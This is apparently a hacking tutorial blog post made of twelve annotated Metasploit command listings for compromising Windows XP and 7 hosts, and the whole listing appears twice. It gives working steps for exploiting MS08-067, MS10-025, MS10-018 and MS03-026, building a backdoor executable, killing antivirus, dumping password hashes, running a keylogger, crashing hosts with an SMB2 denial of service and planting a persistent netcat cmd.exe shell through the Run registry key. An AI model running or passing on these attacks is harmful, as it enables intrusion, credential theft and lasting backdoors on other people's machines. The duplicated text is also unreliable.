Hey guys, I've already explained Metasploit and a few of its attacks. This post is only for Metasploit users who already know the basics of meterpreter, payloads and so on. Don't waste your time reading this if you don't know Metasploit. So what's new in this post? Let's find out:
Requisites:
Backtrack (Attacker)
VMware (Different victims)
Metasploit (of course... )
A logistic Brain
Note: these tutorials are just command listings — there are a lot of them, so work through each one on your own (you only need to run the commands). The IP addresses are examples from the author's lab: replace the "target" ones with your victim VM and the "attacker" ones with your BackTrack box, and never use the same address for both. Run these only against machines you own or are explicitly authorised to test — several of them (the SMB2 DoS, the Run-key netcat backdoor) crash or permanently expose the target.
Ok so without wasting a second let's do it.
Attack 1: Hacking Windows XP with Metasploit tutorial - VNC remote control
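# Attack 1: MS08-067 (SMB NetAPI) against an unpatched Windows XP box, payload = VNC injection.
# bind_tcp means *we* connect *to* the target after exploitation: the target must be directly
# reachable on the payload port, and a host firewall will silently break it (use a reverse
# payload if in doubt). 'show optios' in the original was a typo.
use windows/smb/ms08_067_netapi
show options
set RHOST 192.168.1.1          # target IP
set payload windows/vncinject/bind_tcp
exploit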
Attack 2: Metasploit vs Windows 7 and AVG (reverse meterpreter handler)
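# Attack 2: catch a reverse meterpreter from a Windows 7 host running AVG.
# The handler only listens; the meterpreter executable has to be generated separately
# (see Attack 6) and launched on the target. 'LHOT' in the original was a typo for LHOST.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.1          # attacker IP (the address the payload calls back to)
set LPORT 5555
exploit
# --- in the meterpreter session ---
ps                             # list processes; note the PID of a long-lived one (e.g. explorer.exe)
migrate 1880                   # 1880 is only an example PID taken from the ps output above
cd c:\\                        # 'cd c:\ ls' in the original was two commands run together
ls
download program-7.exe /root   # pull a file from the target to /root on the attacker
run killav                     # tries to kill known AV processes (AVG here); noisy, needs enough privilege, and can itself be alerted on
shell                          # drop to a cmd.exe on the target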
Attack 3: Hacking Windows XP SP3 with Metasploit (MS08-067, reverse meterpreter)
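# Attack 3: MS08-067 against Windows XP SP3 with a reverse meterpreter.
# Select the payload before its options: LHOST belongs to the payload and only appears in
# 'show options' once the payload is set. LHOST and RHOST must be different hosts — the
# original listing used 192.168.1.1 for both, which cannot work.
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.1.1          # target IP
set LHOST 192.168.0.1          # attacker IP (where the reverse shell calls back to)
exploit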
Attack 4: Hacking win7 with metasploit
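# Attack 4: Windows 7 — scan the subnet, then run a handler that keeps listening.
# Fixed from the original: the scan range was missing an octet ("192.168.1-255"),
# "EndOnSession" is not an option (it is ExitOnSession), and multi/handler has no
# RHOST/RPORT — it only listens on LHOST:LPORT, so those two 'set' lines were no-ops.
nmap -sS -v -Pn 192.168.1.1-255   # SYN scan the /24 without host discovery (-Pn; older nmap spells it -PN)
use exploit/multi/handler
set LHOST 192.168.1.1          # attacker IP
set LPORT 5555
set payload windows/meterpreter/reverse_tcp
show options
set ExitOnSession false        # keep the listener up after the first session instead of exiting
show options
exploit -j                     # -j runs the handler as a background job; attach with 'sessions -i <id>'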
Attack 5: SMB2 denial of service against Windows 7 (crashes the target — this one gives no shell)
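# Attack 5: SMB2 negotiate DoS against Windows 7 / Vista / Server 2008 (CVE-2009-3103).
# This is an *auxiliary* module, not an exploit: a successful run blue-screens the target;
# it does not give you a session. Do not run it against anything you are not prepared to crash.
sudo nmap 192.168.1.1          # confirm 445/tcp open (microsoft-ds) before trying
use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
set RHOST 192.168.1.1          # target IP
set RPORT 445
run                            # auxiliary modules are started with 'run' ('exploit' is an alias)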
Attack 6: Metasploit backdooring
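# Attack 6: build a standalone meterpreter executable, then catch it with a handler.
# The msfpayload line runs in a normal shell inside the msf3 directory (the 'msf3#' in the
# original was a directory prompt, not msfconsole): X = emit a Windows PE, saved as backdoor.exe.
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 X > backdoor.exe
cd /tmp
# backdoor.exe has to be delivered to and launched on the target by some other means;
# it is unencoded and will be flagged by most AV.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.1          # listener / attacker IP — must match the LHOST baked into backdoor.exe
show options
exploit
# --- in the meterpreter session ---
?                              # command list
getuid                         # which user the session runs as
use priv                       # load the priv extension (older Metasploit 3 needs it for hashdump)
hashdump                       # dumps SAM hashes; needs SYSTEM — if getuid is not SYSTEM, escalate or migrate first
keyscan_start                  # the keylogger only sees the desktop of the process you are in; migrate into explorer.exe first
keyscan_dump
sysinfo
# 'msg' is a Windows command, not a meterpreter one: run it from a cmd.exe on the target
shell
msg * "message displayed on the target's screen"
exit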
Attack 7: MS10-025 Metasploit exploitation (Windows Media Services)
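# Attack 7: MS10-025 — Windows Media Services (WMSS) connect_funnel overflow.
# The module path in the original had a typo (ms10_25); the real name is
# exploit/windows/mmsp/ms10_025_wmss_connect_funnel. It only applies to hosts actually running
# Windows Media Services, so check for that service — an OS fingerprint alone is not enough.
nmap -O 192.168.1.7            # fingerprint the target OS
search ms10
use exploit/windows/mmsp/ms10_025_wmss_connect_funnel
set payload windows/shell_bind_tcp   # bind shell: we connect to the target afterwards, so it must be reachable
show options
set RHOST 192.168.1.7          # target IP
exploit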
Attack 8: IEPeers: ms10_018_ie_behaviors exploit (browser-based, Internet Explorer only)
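# Attack 8: IEPeers (MS10-018, ms10_018_ie_behaviors) — a *browser* exploit: Metasploit serves
# a malicious page and the victim has to be lured into opening it in a vulnerable IE.
search iepeers
use windows/browser/ms10_018_ie_behaviors
set PAYLOAD windows/exec
show options
set SRVHOST 192.168.1.1        # attacker IP the exploit web server binds to
set URIPATH /                  # serve the exploit at the site root so the URL is just http://host:8080/
set CMD calc.exe               # proof-of-concept payload: pops calc on the victim
info                           # read the target list *first* — the index below must match the victim's IE version
set target 1                   # in this listing: 1 = IE 6 SP0-SP2 (onclick)
exploit
# msfconsole prints something like:  Using URL: http://192.168.1.1:8080/
# On the *victim*, open the vulnerable Internet Explorer (not Firefox — the bug is in IE's
# mshtml, so "whatever browser" will not work) and browse to http://192.168.1.1:8080/ ;
# the exploit fires after a few moments.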
Attack 9: Metasploit RPC DCOM (MS03-026)
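# Attack 9: MS03-026 RPC DCOM.
# NOTE(review): the module and payload names below (msrpc_dcom_ms03_026, win32_reverse_meterpreter,
# 'use -m process', 'interact 1') are Metasploit 2.x syntax and will not resolve on Metasploit 3.
# The MSF3 equivalents are exploit/windows/dcerpc/ms03_026_dcom with
# windows/meterpreter/reverse_tcp, where meterpreter offers 'execute -f cmd.exe -i' / 'shell' directly.
nmap -sS 192.168.1.1           # the target must show 135/tcp open (MS RPC endpoint mapper)
use msrpc_dcom_ms03_026
set payload win32_reverse_meterpreter
show options
set RHOST 192.168.1.1          # target IP
set LHOST 192.168.0.1          # attacker IP
exploit
# --- in the (Metasploit 2 style) meterpreter session ---
help
use -m process                 # load the process extension
execute -f cmd.exe -c          # start cmd.exe with a channel attached
interact 1                     # attach to channel 1; you land in C:\winnt\system32> and can run e.g. 'dir'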
Attack 10: Uploading A Backdoor Metasploit Netcat
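# Attack 10: persist a netcat bind shell through the HKLM Run key (run inside a meterpreter session).
# What this installs is an *unauthenticated* cmd.exe listener on 5555/tcp that starts at every
# logon: anyone who can reach that port gets a shell with the logged-on user's rights. Lab use
# only, and remove it afterwards (reg deleteval on the same key/value, then delete netcat.exe).
# Fixed from the original: 'CureentVersion', an unquoted value name containing a space, and an
# unterminated -d string.
upload netcat.exe c:\\WINDOWS\\SYSTEM32\\
reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run
reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run -v "windows live" -d "c:\\WINDOWS\\SYSTEM32\\netcat.exe -L -d -p 5555 -e cmd.exe"
reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run   # confirm the value is present
reboot                         # Run-key entries start at logon, so the listener is only up once someone logs on
# from the attacker (bt ~#), once the target is back up:
nc 192.168.1.1 5555            # target IP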
Attack 11: BackTrack 4 R1 Metasploit 3 & SET, Hacking Windows 7
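# Attack 11: BackTrack 4 R1, Metasploit 3 and SET against Windows 7.
# SET is menu-driven; the menu numbers below are for the SET build bundled with BackTrack 4 R1
# and shift between releases — read each menu rather than typing them blind.
cd /pentest/exploits/SET
./set
# Enter your choice: 4
# Enter the IP address: 192.168.1.1        (attacker / listener IP)
# Enter choice (hit enter for default): 2
# Enter choice (hit enter for default): 16
# Port: 4444
# SET writes the generated payload as msf.exe under /pentest/exploits/SET/ (open it in Konqueror
# if you like); copy it to removable media (e.g. /media/sda3) and run it on the target.
cd /pentest/exploits/framework3
./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.1          # must match the IP entered into SET above
set LPORT 4444                 # must match the port entered into SET above
exploit
# --- in the meterpreter session --- ('excecute' / 'screenhot' in the original were typos)
use priv
help
execute -f cmd.exe
ipconfig
shell                          # cmd.exe on the target; 'exit' returns to meterpreter
screenshot
execute -f explorer.exe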
Attack 12: MS08-067 + netcat backdoor
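# Attack 12: MS08-067, then drop nc.exe on the target for a later backdoor (Attack 10 shows the Run-key part).
# The original listing left RHOST and LHOST with no value; 'set OPTION' without a value does not
# set anything, so the exploit would have run with RHOST empty. The addresses below are placeholders.
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.1.1          # target IP
set LHOST 192.168.0.1          # attacker IP
exploit
# --- in the meterpreter session ---
upload /root/nc.exe c:\\WINDOWS\\SYSTEM32\\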
Requisites:
Backtrack (Attacker)
VMware (Different victims)
Metasploit (of course... )
A logistic Brain
Note: these tutorials are just command listings — there are a lot of them, so work through each one on your own (you only need to run the commands). The IP addresses are examples from the author's lab: replace the "target" ones with your victim VM and the "attacker" ones with your BackTrack box, and never use the same address for both. Run these only against machines you own or are explicitly authorised to test — several of them (the SMB2 DoS, the Run-key netcat backdoor) crash or permanently expose the target.
Ok so without wasting a second let's do it.
Attack 1: Hacking Windows XP with Metasploit tutorial - VNC remote control
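# Attack 1: MS08-067 (SMB NetAPI) against an unpatched Windows XP box, payload = VNC injection.
# bind_tcp means *we* connect *to* the target after exploitation: the target must be directly
# reachable on the payload port, and a host firewall will silently break it (use a reverse
# payload if in doubt). 'show optios' in the original was a typo.
use windows/smb/ms08_067_netapi
show options
set RHOST 192.168.1.1          # target IP
set payload windows/vncinject/bind_tcp
exploit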
Attack 2: Metasploit vs Windows 7 and AVG (reverse meterpreter handler)
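# Attack 2: catch a reverse meterpreter from a Windows 7 host running AVG.
# The handler only listens; the meterpreter executable has to be generated separately
# (see Attack 6) and launched on the target. 'LHOT' in the original was a typo for LHOST.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.1          # attacker IP (the address the payload calls back to)
set LPORT 5555
exploit
# --- in the meterpreter session ---
ps                             # list processes; note the PID of a long-lived one (e.g. explorer.exe)
migrate 1880                   # 1880 is only an example PID taken from the ps output above
cd c:\\                        # 'cd c:\ ls' in the original was two commands run together
ls
download program-7.exe /root   # pull a file from the target to /root on the attacker
run killav                     # tries to kill known AV processes (AVG here); noisy, needs enough privilege, and can itself be alerted on
shell                          # drop to a cmd.exe on the target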
Attack 3: Hacking Windows XP SP3 with Metasploit (MS08-067, reverse meterpreter)
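# Attack 3: MS08-067 against Windows XP SP3 with a reverse meterpreter.
# Select the payload before its options: LHOST belongs to the payload and only appears in
# 'show options' once the payload is set. LHOST and RHOST must be different hosts — the
# original listing used 192.168.1.1 for both, which cannot work.
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.1.1          # target IP
set LHOST 192.168.0.1          # attacker IP (where the reverse shell calls back to)
exploit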
Attack 4: Hacking win7 with metasploit
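# Attack 4: Windows 7 — scan the subnet, then run a handler that keeps listening.
# Fixed from the original: the scan range was missing an octet ("192.168.1-255"),
# "EndOnSession" is not an option (it is ExitOnSession), and multi/handler has no
# RHOST/RPORT — it only listens on LHOST:LPORT, so those two 'set' lines were no-ops.
nmap -sS -v -Pn 192.168.1.1-255   # SYN scan the /24 without host discovery (-Pn; older nmap spells it -PN)
use exploit/multi/handler
set LHOST 192.168.1.1          # attacker IP
set LPORT 5555
set payload windows/meterpreter/reverse_tcp
show options
set ExitOnSession false        # keep the listener up after the first session instead of exiting
show options
exploit -j                     # -j runs the handler as a background job; attach with 'sessions -i <id>'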
Attack 5: SMB2 denial of service against Windows 7 (crashes the target — this one gives no shell)
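# Attack 5: SMB2 negotiate DoS against Windows 7 / Vista / Server 2008 (CVE-2009-3103).
# This is an *auxiliary* module, not an exploit: a successful run blue-screens the target;
# it does not give you a session. Do not run it against anything you are not prepared to crash.
sudo nmap 192.168.1.1          # confirm 445/tcp open (microsoft-ds) before trying
use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
set RHOST 192.168.1.1          # target IP
set RPORT 445
run                            # auxiliary modules are started with 'run' ('exploit' is an alias)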
Attack 6: Metasploit backdooring
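# Attack 6: build a standalone meterpreter executable, then catch it with a handler.
# The msfpayload line runs in a normal shell inside the msf3 directory (the 'msf3#' in the
# original was a directory prompt, not msfconsole): X = emit a Windows PE, saved as backdoor.exe.
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 X > backdoor.exe
cd /tmp
# backdoor.exe has to be delivered to and launched on the target by some other means;
# it is unencoded and will be flagged by most AV.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.1          # listener / attacker IP — must match the LHOST baked into backdoor.exe
show options
exploit
# --- in the meterpreter session ---
?                              # command list
getuid                         # which user the session runs as
use priv                       # load the priv extension (older Metasploit 3 needs it for hashdump)
hashdump                       # dumps SAM hashes; needs SYSTEM — if getuid is not SYSTEM, escalate or migrate first
keyscan_start                  # the keylogger only sees the desktop of the process you are in; migrate into explorer.exe first
keyscan_dump
sysinfo
# 'msg' is a Windows command, not a meterpreter one: run it from a cmd.exe on the target
shell
msg * "message displayed on the target's screen"
exit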
Attack 7: MS10-025 Metasploit exploitation (Windows Media Services)
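# Attack 7: MS10-025 — Windows Media Services (WMSS) connect_funnel overflow.
# The module path in the original had a typo (ms10_25); the real name is
# exploit/windows/mmsp/ms10_025_wmss_connect_funnel. It only applies to hosts actually running
# Windows Media Services, so check for that service — an OS fingerprint alone is not enough.
nmap -O 192.168.1.7            # fingerprint the target OS
search ms10
use exploit/windows/mmsp/ms10_025_wmss_connect_funnel
set payload windows/shell_bind_tcp   # bind shell: we connect to the target afterwards, so it must be reachable
show options
set RHOST 192.168.1.7          # target IP
exploit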
Attack 8: IEPeers: ms10_018_ie_behaviors exploit (browser-based, Internet Explorer only)
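# Attack 8: IEPeers (MS10-018, ms10_018_ie_behaviors) — a *browser* exploit: Metasploit serves
# a malicious page and the victim has to be lured into opening it in a vulnerable IE.
search iepeers
use windows/browser/ms10_018_ie_behaviors
set PAYLOAD windows/exec
show options
set SRVHOST 192.168.1.1        # attacker IP the exploit web server binds to
set URIPATH /                  # serve the exploit at the site root so the URL is just http://host:8080/
set CMD calc.exe               # proof-of-concept payload: pops calc on the victim
info                           # read the target list *first* — the index below must match the victim's IE version
set target 1                   # in this listing: 1 = IE 6 SP0-SP2 (onclick)
exploit
# msfconsole prints something like:  Using URL: http://192.168.1.1:8080/
# On the *victim*, open the vulnerable Internet Explorer (not Firefox — the bug is in IE's
# mshtml, so "whatever browser" will not work) and browse to http://192.168.1.1:8080/ ;
# the exploit fires after a few moments.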
Attack 9: Metasploit RPC DCOM (MS03-026)
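# Attack 9: MS03-026 RPC DCOM.
# NOTE(review): the module and payload names below (msrpc_dcom_ms03_026, win32_reverse_meterpreter,
# 'use -m process', 'interact 1') are Metasploit 2.x syntax and will not resolve on Metasploit 3.
# The MSF3 equivalents are exploit/windows/dcerpc/ms03_026_dcom with
# windows/meterpreter/reverse_tcp, where meterpreter offers 'execute -f cmd.exe -i' / 'shell' directly.
nmap -sS 192.168.1.1           # the target must show 135/tcp open (MS RPC endpoint mapper)
use msrpc_dcom_ms03_026
set payload win32_reverse_meterpreter
show options
set RHOST 192.168.1.1          # target IP
set LHOST 192.168.0.1          # attacker IP
exploit
# --- in the (Metasploit 2 style) meterpreter session ---
help
use -m process                 # load the process extension
execute -f cmd.exe -c          # start cmd.exe with a channel attached
interact 1                     # attach to channel 1; you land in C:\winnt\system32> and can run e.g. 'dir'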
Attack 10: Uploading A Backdoor Metasploit Netcat
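# Attack 10: persist a netcat bind shell through the HKLM Run key (run inside a meterpreter session).
# What this installs is an *unauthenticated* cmd.exe listener on 5555/tcp that starts at every
# logon: anyone who can reach that port gets a shell with the logged-on user's rights. Lab use
# only, and remove it afterwards (reg deleteval on the same key/value, then delete netcat.exe).
# Fixed from the original: 'CureentVersion', an unquoted value name containing a space, and an
# unterminated -d string.
upload netcat.exe c:\\WINDOWS\\SYSTEM32\\
reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run
reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run -v "windows live" -d "c:\\WINDOWS\\SYSTEM32\\netcat.exe -L -d -p 5555 -e cmd.exe"
reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run   # confirm the value is present
reboot                         # Run-key entries start at logon, so the listener is only up once someone logs on
# from the attacker (bt ~#), once the target is back up:
nc 192.168.1.1 5555            # target IP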
Attack 11: BackTrack 4 R1 Metasploit 3 & SET, Hacking Windows 7
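# Attack 11: BackTrack 4 R1, Metasploit 3 and SET against Windows 7.
# SET is menu-driven; the menu numbers below are for the SET build bundled with BackTrack 4 R1
# and shift between releases — read each menu rather than typing them blind.
cd /pentest/exploits/SET
./set
# Enter your choice: 4
# Enter the IP address: 192.168.1.1        (attacker / listener IP)
# Enter choice (hit enter for default): 2
# Enter choice (hit enter for default): 16
# Port: 4444
# SET writes the generated payload as msf.exe under /pentest/exploits/SET/ (open it in Konqueror
# if you like); copy it to removable media (e.g. /media/sda3) and run it on the target.
cd /pentest/exploits/framework3
./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.1          # must match the IP entered into SET above
set LPORT 4444                 # must match the port entered into SET above
exploit
# --- in the meterpreter session --- ('excecute' / 'screenhot' in the original were typos)
use priv
help
execute -f cmd.exe
ipconfig
shell                          # cmd.exe on the target; 'exit' returns to meterpreter
screenshot
execute -f explorer.exe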
Attack 12: MS08-067 + netcat backdoor
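# Attack 12: MS08-067, then drop nc.exe on the target for a later backdoor (Attack 10 shows the Run-key part).
# The original listing left RHOST and LHOST with no value; 'set OPTION' without a value does not
# set anything, so the exploit would have run with RHOST empty. The addresses below are placeholders.
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.1.1          # target IP
set LHOST 192.168.0.1          # attacker IP
exploit
# --- in the meterpreter session ---
upload /root/nc.exe c:\\WINDOWS\\SYSTEM32\\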